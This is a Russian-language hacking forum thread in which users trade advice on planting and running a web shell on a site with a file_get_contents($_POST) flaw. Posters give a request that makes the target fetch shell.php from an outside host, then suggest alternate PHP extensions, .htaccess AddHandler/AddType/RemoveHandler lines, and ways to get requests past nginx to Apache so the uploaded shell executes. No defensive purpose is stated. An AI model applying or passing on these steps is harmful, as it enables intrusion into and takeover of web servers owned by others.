Помогите залить шел

Discussion in 'Песочница' started by user0, 3 Apr 2016.

  1. user0

    user0 New Member

    Joined:
    3 Apr 2016
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    На изучаемом сайте найдена уязвимость:

    file_get_contents($_POST['n'])

    можно ли как-то залить шел или выполнить sql запрос?
    Спасибо.
     
    #1 user0, 3 Apr 2016
    Last edited: 3 Apr 2016
  2. boool

    boool New Member

    Joined:
    15 Sep 2013
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Например вот так:
    site/?n=http://exec.site/shell.php
    в shell.php
    <?php
    mkdir('xack', 0777);

    самое простое

    только post запросом, не get.
    Это не трудно
     
  3. eastpearldxb

    eastpearldxb New Member

    Joined:
    21 Nov 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Задил шелл, но тут проблемка. В папке где залит шелл, нельзя выполнять команды php, то есть файлы с расширением php нельзя запустить
     
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,550
    Likes Received:
    1,252
    Reputations:
    274
    php2,php3,php5,phtml,shtml
     
  5. eastpearldxb

    eastpearldxb New Member

    Joined:
    21 Nov 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Не работает, может туда как нибудь .htaccess залить?
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,550
    Likes Received:
    1,252
    Reputations:
    274
    ну если там есть .htaccess, то не зальешь, а в другую папку?
     
  7. eastpearldxb

    eastpearldxb New Member

    Joined:
    21 Nov 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Шел то залился, только он не запускуется,ьак как нельзя php файлы запускать. php2, php3 и тог далее тоже не помогает. Как еще можно запустить шелл?
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,550
    Likes Received:
    1,252
    Reputations:
    274
    в другую папку пробуй залить шелл
     
  9. eastpearldxb

    eastpearldxb New Member

    Joined:
    21 Nov 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Да в другие папкм также получается. На гугле прочитал, что можно как то через .htaccess дать доступ к php файлам
     
  10. gena ryzhov

    gena ryzhov Member

    Joined:
    18 Dec 2013
    Messages:
    17
    Likes Received:
    7
    Reputations:
    0
    В Гугле: addhandler htaccess

    AddHandler application/x-httpd-php .расширение
    AddType application/x-httpd-php .php . расширение
     
    t0ma5 likes this.
  11. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    830
    Likes Received:
    814
    Reputations:
    90
    RemoveHandler желательно сначала делать, чтоб поменьше коллизий было
     
    _________________________
    grimnir, Gorev and gena ryzhov like this.
  12. gena ryzhov

    gena ryzhov Member

    Joined:
    18 Dec 2013
    Messages:
    17
    Likes Received:
    7
    Reputations:
    0
    Но если перед апачем стоит nginx то нужно расширение файла которое nginx пропустит к апачу)
     
    t0ma5 likes this.
  13. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    830
    Likes Received:
    814
    Reputations:
    90
    можно воспользоваться методом [тут цензура] , для обхода кеширования сеошники добавляют такие веши app.css?v=12345 , такой запрос долетит до апача
    хотя в целом ситуация очень редкая, расширение файла которое подхватывается nginx'ом и выполняется на бекенде..
     
    _________________________
    Veil and Gorev like this.
Loading...